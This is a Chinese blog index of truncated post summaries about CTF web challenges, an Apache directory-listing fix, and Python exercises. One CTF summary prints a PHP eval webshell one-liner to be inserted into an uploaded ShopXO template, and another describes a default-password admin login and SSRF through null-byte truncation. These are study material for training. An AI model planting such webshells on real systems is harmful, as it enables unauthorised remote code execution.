摘要:话说,我一直没注意到自己服务器上的apache有目录遍历漏洞,直到我学了web中间件漏洞 这个漏洞存在三个月了,当时是建靶场,在apache默认目录下新建了目录才出现的漏洞 漏洞截图: Ubuntu下apache默认安装目录,将所有<Directory>标签下的indexes删除,这样一来,如果找不 阅读全文
posted @ 2020-05-28 17:40 ch0bits 阅读(13) 评论(0) 推荐(0) 编辑
摘要:日常写脚本,最后添了关闭文件报错,错误原因是把f.open().read()连接使用(语法没有什么问题) 修改成如下,就能正常打印读取文件的内容 f=open('/Users/ASUS/desktop/vray.txt','r') print(f.read()) f.close() 关于写入文件,会 阅读全文
posted @ 2020-05-28 06:54 ch0bits 阅读(2) 评论(0) 推荐(0) 编辑
摘要:老八小超市 网页是个购物网站模板,后台是admin.php 查询得知ShopXO默认密码为shopxo 登陆进入后台,查找主题模板,并下载免费的默认模板 在模板压缩包的_static_目录下,插入一句话木马并上传 <?php @eval($_POST[a]); phpinfo(); ?> 上传以后会 阅读全文
posted @ 2020-05-27 21:23 ch0bits 阅读(25) 评论(0) 推荐(0) 编辑
摘要:CVE版签到 这道题主要考察的是cve-2020-7066,ssrf 漏洞 https://www.anquanke.com/vul/id/1966253 https://bugs.php.net/bug.php?id=79329 利用方法: 通过\0截断,访问本地主机,题目这里是使用%00截断 / 阅读全文
posted @ 2020-05-26 09:48 ch0bits 阅读(18) 评论(0) 推荐(0) 编辑
摘要:比赛刚结束,跟着师傅们的WP来学技术,说来惭愧,这次比赛题目除了签到一个都没做出来 Web - Checkin 题目代码给出来,第一感觉是要序列化,但是不存在反序列化函数 WP写的很简单,Ginkgo可以传参,之后参数会保存在当前页面中,传参一句话,使用连接工具连接 查看PHP配置信息: 需要将'p 阅读全文
posted @ 2020-05-25 21:40 ch0bits 阅读(89) 评论(0) 推荐(0) 编辑
摘要:第5章-5 统计字符出现次数 a=str(input()) n=str(input()) b=len(a) count=0 for i in range(b): if(a[i]==n): count+=1 print(count) 第5章-6 统计工龄 a=int(input()) b=list() 阅读全文
posted @ 2020-05-25 16:38 ch0bits 阅读(9) 评论(0) 推荐(0) 编辑
摘要: 想起了一个人打比赛的时光 阅读全文
posted @ 2020-05-21 10:00 ch0bits 阅读(5) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2020-05-18 21:47 ch0bits 阅读(4) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2020-05-17 14:49 ch0bits 阅读(31) 评论(0) 推荐(0) 编辑
摘要:题目要求我们实现进制的转换,当时做题只写出来一个实现两位数的 import math a,b=map(int,input().split(',')) c=len(str(a)) d=e=f=0 g=a for i in range(c): g-=f d=round(g/10**(c-i-1)) f= 阅读全文
posted @ 2020-05-14 16:02 ch0bits 阅读(14) 评论(0) 推荐(0) 编辑